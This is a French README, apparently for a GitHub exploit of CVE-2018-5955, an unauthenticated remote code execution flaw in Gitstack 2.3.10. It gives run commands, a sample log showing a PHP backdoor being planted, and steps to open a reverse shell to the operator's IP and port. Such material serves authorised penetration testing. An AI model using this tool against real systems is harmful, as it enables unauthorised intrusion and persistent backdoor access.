Un exploit pour CVE-2018-5955 Gitstack 2.3.10 RCE non authentifié
Exploit: Gitstack 2.3.10 Exécution du code distant non authentifié
Date: 18.01.2018
Lien logiciel: https://gitstack.com/
Exploiter Auteur: Kacper Szurek
Exploit original: https://www.exploit-db.com/expoits/43777
Site Web: https://security.szurek.pl/
Catégorie: distant
CVE: CVE-2018-5955
Date: 23.06.2023
Nouvelles fonctionnalités: RCE interactive, détection du système
CVE: CVE-2018-5955
Catégorie: distant
Je ne prends aucune responsabilité pour vos actions, car je l'ai publié sur GitHub à des fins d'éducation ou des tests de pénétration certifiés et autorisés
Installation des exigences:
pip install colorama
Ensuite, vous pouvez l'exécuter avec:
python3 exploit.py
Le système d'exploitation sera détecté après avoir exploité le CVE, en fait, il y aura cette ligne de sortie: "[*] OS: $ OperatingSystem" (Dimostration ci-dessous)
[+] Get user list
[+] Found user twreath
[+] Web repository already enabled
[+] Get repositories list
[+] Found repository Website
[+] Add user to repository
[+] Disable access for anyone
[+] Create backdoor in PHP
[*] Type 'shell' to get a reverse shell
[*] OS : Windows <----
Vous pouvez également taper "OS" pour savoir quel type de système d'exploitation
Pour obtenir un shell inversé réel sur la cible, vous pouvez taper "shell", puis taper votre IP et votre port d'écoute comme ceci:
RCE > shell
[?] Please enter the IP address for the shell: YOUR IP HERE
[?] Please enter the port number for the shell: YOUR LISTEN PORT HERE